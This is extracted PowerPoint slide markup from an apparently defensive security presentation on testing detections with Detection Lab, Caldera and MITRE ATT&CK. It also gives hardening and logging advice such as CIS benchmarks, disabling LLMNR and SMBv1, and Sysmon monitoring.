          <a:xfrm>
            <a:off x="766760" y="1639210"/>
            <a:ext cx="8184662" cy="411171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://github.com/clong/DetectionLab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A944208B-6518-435C-90B8-630A4477D61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D8AE9F-E5CA-4F7B-96A8-B31A88E0A333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3470879" y="-1"/>
            <a:ext cx="5574834" cy="6762997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2341653E-51CE-440E-87F7-BBCC7DD21DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38876" y="2136076"/>
            <a:ext cx="3470191" cy="4626921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3486565" y="28575"/>
            <a:ext cx="5581650" cy="6800850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1041056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6DBA-C3CF-4278-B772-BAC94BEF2F7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766760" y="1639210"/>
            <a:ext cx="8184662" cy="411171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A944208B-6518-435C-90B8-630A4477D61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caldera in Detection Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2341653E-51CE-440E-87F7-BBCC7DD21DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481231" y="1639210"/>
            <a:ext cx="3470191" cy="4626921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="158496" y="1639210"/>
            <a:ext cx="5322735" cy="5001323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1374977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44208B-6518-435C-90B8-630A4477D61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="365069"/>
            <a:ext cx="8184662" cy="500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caldera using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ATT&amp;CK Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="839253"/>
            <a:ext cx="9192908" cy="6354062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3281475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6DBA-C3CF-4278-B772-BAC94BEF2F7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766760" y="1639210"/>
            <a:ext cx="8184662" cy="411171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A944208B-6518-435C-90B8-630A4477D61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caldera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Exploit Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1496992"/>
            <a:ext cx="9144000" cy="4839375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2455713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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Let’s add it to our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HeatMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA1C9BB5-9F0C-46B5-831F-0C11715829C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="330354" y="1995211"/>
            <a:ext cx="8526065" cy="3953427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2919527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59E99-7970-48F5-BB5F-7CD3794BA240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="1555669"/>
            <a:ext cx="8184662" cy="586170"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>CIS-CAT | Cheat-Sheets | Attack-Confirm Defense (New-Attacks)| Measure –Repeat!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DAA22D-D1ED-446A-8C1A-A8CFCEF6E017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yes! Look at that; Getting Better!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{014DF802-0CD5-406A-BD75-96261B3B56EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2333999"/>
            <a:ext cx="9144000" cy="3997997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2348469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DB527B-F40C-4A2B-82FD-F9400B4A863E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402336" y="2060028"/>
            <a:ext cx="8558783" cy="4587351"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Best Practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Center for Internet Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cisecurity.org/cybersecurity-best-practices/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; Benchmarks/Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIS-CAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Disable services/ports not needed (LLMNR &amp; SMBv1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> you need on system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>https://www.malwarearchaeology.com/cheat-sheets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitor your Registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, WMI, PowerShell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmdlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, EXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hunt More Behavior and some signatures -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Know Thy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enemy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ATT&amp;CK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/wiki/ATT%26CK_Matrix</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://redcanary.com/atomic-red-team/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/clong/DetectionLab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://cyberwardog.blogspot.com/2017/07/how-hot-is-your-hunt-team.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The End… until next time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671305" y="905699"/>
            <a:ext cx="1117614" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>¯\_(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ツ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)_/¯</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3375734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30FDD0-E3D9-493D-B585-0D804D1772DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q/A  moorej1@uw.edu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3568FB7C-6A81-4D47-8592-A470285C36F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yep, that was a lot… </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A565669F-070C-4998-B4F6-DD3BB158115B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2386983" y="2141838"/>
            <a:ext cx="6469436" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A9A3C8-4930-4D69-9E9C-6EC74B566C0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="348633" y="2141838"/>
            <a:ext cx="2038350" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413239" y="6470729"/>
            <a:ext cx="5460023" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download Resources Here: http://bit.ly/AdversaryTactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204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59305" y="2141838"/>
            <a:ext cx="8197114" cy="1565189"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the biggest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to org?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taken together, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and pretexting represent 93% of all social breaches in the study. </a:t>
